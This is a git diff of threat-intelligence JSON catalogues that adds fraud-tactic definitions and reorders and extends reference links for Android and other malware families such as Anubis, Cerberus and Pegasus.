+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "dd09e952-7992-5a37-a9c4-ed978d89a939",
+ "value": "Deployment Error"
+ },
+ {
+ "description": "Merchants not following best practice procedures to avoid criminal or fraudulent activity,",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "39a06139-ece8-5d8c-947e-cf0b4dbdccf6",
+ "value": "Merchant Negligence"
+ },
+ {
+ "description": "Implementation of a sstem, solution or service not according to defined and tested standards",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "a52f8c2e-4a38-5b1b-a4b0-4710606cd86f",
+ "value": "Implementation not according to Standards"
}
],
- "version": 4
+ "version": 6
}
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index b9b0fd8..dc625e6 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -20,35 +20,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://github.com/fboldewin/FastCashMalwareDissected/",
- "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A",
- "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.youtube.com/watch?v=zGvQPtejX9w",
- "https://www.us-cert.gov/ncas/alerts/TA18-275A",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
- "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://www.youtube.com/watch?v=zGvQPtejX9w",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
+ "https://github.com/fboldewin/FastCashMalwareDissected/",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
+ "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
- "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware"
+ "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e306fe62-c708-11e8-89f2-073e396e5403",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02",
"value": "FastCash"
},
@@ -70,12 +61,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot",
- "https://twitter.com/_icebre4ker_/status/1460527428544176128",
"https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/",
+ "https://twitter.com/_icebre4ker_/status/1460527428544176128",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes",
"https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/",
- "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
+ "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/"
],
"synonyms": [
"Escobar"
@@ -91,8 +82,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu",
"https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign"
+ "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
],
"synonyms": [],
"type": []
@@ -106,8 +97,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
- "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/",
- "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html"
+ "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html",
+ "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/"
],
"synonyms": [
"AxeSpy"
@@ -149,10 +140,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://securelist.com/transparent-tribe-part-2/98233/",
"https://www.secrss.com/articles/24995",
- "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/",
- "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset"
+ "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
+ "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/"
],
"synonyms": [],
"type": []
@@ -166,14 +158,17 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
"https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
"https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
+ "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
"https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing",
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
"https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/",
- "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf"
+ "https://twitter.com/_CPResearch_/status/1603375823448317953",
+ "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
+ "https://muha2xmad.github.io/malware-analysis/alien/"
],
"synonyms": [
"AlienBot"
@@ -205,22 +200,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa",
- "https://twitter.com/_icebre4ker_/status/1416409813467156482",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://gbhackers.com/teabot-banking-trojan/",
- "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
"https://twitter.com/ThreatFabric/status/1394958795508523008",
- "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
- "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
+ "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
"https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
- "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf",
+ "https://twitter.com/_icebre4ker_/status/1416409813467156482",
+ "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
+ "https://gbhackers.com/teabot-banking-trojan/",
+ "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
"https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
- "https://labs.k7computing.com/?p=22407",
- "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/",
"https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html",
+ "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf",
"https://www.cleafy.com/documents/teabot",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
"https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf",
- "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/"
+ "https://labs.k7computing.com/?p=22407"
],
"synonyms": [
"ReBot",
@@ -237,15 +232,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
- "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
"https://github.com/DesignativeDave/androrat",
"https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
"https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
"https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
"https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg"
],
"synonyms": [],
@@ -259,34 +254,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "https://www.youtube.com/watch?v=U0UsfO-0uJM",
- "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://muha2xmad.github.io/malware-analysis/anubis/",
- "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
- "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
- "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
- "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
"https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
+ "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
+ "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
"https://0x1c3n.tech/anubis-android-malware-analysis",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
+ "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
"https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
+ "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb",
+ "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://muha2xmad.github.io/malware-analysis/anubis/",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
"https://community.riskiq.com/article/85b3db8c",
"https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
- "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
- "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
- "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb"
+ "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
+ "https://www.youtube.com/watch?v=U0UsfO-0uJM",
+ "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [
"BankBot",
@@ -303,8 +298,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/",
- "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf"
+ "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
],
"synonyms": [],
"type": []
@@ -317,8 +312,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/"
+ "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [],
"type": []
@@ -385,12 +380,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut",
- "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
+ "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/",
+ "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
- "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/"
+ "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw"
],
"synonyms": [],
"type": []
@@ -404,8 +400,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke",
"https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/",
- "https://twitter.com/LukasStefanko/status/1280243673100402690",
- "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE"
+ "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE",
+ "https://twitter.com/LukasStefanko/status/1280243673100402690"
],
"synonyms": [],
"type": []
@@ -418,13 +414,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian",
+ "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
+ "https://www.youtube.com/watch?v=DPFcvSy4OZk",
"https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56",
"https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html",
- "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
- "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
"https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
- "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726",
- "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221"
+ "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
+ "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
+ "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726"
],
"synonyms": [
"Hydra"
@@ -432,19 +429,32 @@
"type": []
},
"uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc",
- "value": "BianLian"
+ "value": "BianLian (Android)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex",
+ "https://www.threatfabric.com/blogs/brasdex-a-new-brazilian-ats-malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dc5408e9-e9e8-44fd-ac5c-231483d0ebe3",
+ "value": "BrasDex"
},
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata",
- "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html",
"https://securelist.com/spying-android-rat-from-brazil-brata/92775/",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again",
"https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account",
- "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat"
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html",
+ "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat",
+ "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again"
],
"synonyms": [
"AmexTroll"
@@ -459,6 +469,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda",
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf"
],
"synonyms": [],
@@ -485,6 +497,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat",
+ "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/",
"https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html"
],
"synonyms": [],
@@ -525,25 +538,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus",
- "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
- "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/",
- "https://nur.pub/cerberus-analysis",
- "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
- "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
- "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
- "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
"https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://twitter.com/AndroidCerberus",
- "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus",
- "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
- "https://github.com/ics-iot-bootcamp/cerberus_research",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
+ "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
"https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html",
+ "https://nur.pub/cerberus-analysis",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
+ "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus",
+ "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/",
+ "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://github.com/ics-iot-bootcamp/cerberus_research",
+ "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://community.riskiq.com/article/85b3db8c"
+ "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
+ "https://community.riskiq.com/article/85b3db8c",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
+ "https://twitter.com/AndroidCerberus",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [],
"type": []
@@ -571,9 +585,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
- "http://blog.checkpoint.com/2017/01/24/charger-malware/",
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html",
"https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf",
- "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
+ "http://blog.checkpoint.com/2017/01/24/charger-malware/"
],
"synonyms": [],
"type": []
@@ -586,8 +601,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.chinotto",
- "https://blog.cyble.com/2021/12/06/apt37-using-a-new-android-spyware-chinotto/",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://blog.cyble.com/2021/12/06/apt37-using-a-new-android-spyware-chinotto/"
],
"synonyms": [],
"type": []
@@ -600,67 +615,69 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
- "https://twitter.com/billmarczak/status/1416801439402262529",
- "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
- "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
- "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
- "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
- "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/",
- "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
- "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
- "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
- "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
- "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
- "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
- "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
- "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
- "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
- "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
- "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
- "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
- "https://thewire.in/tag/pegasus-project",
"https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/",
- "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
- "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
- "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
- "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/",
- "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
- "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
- "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
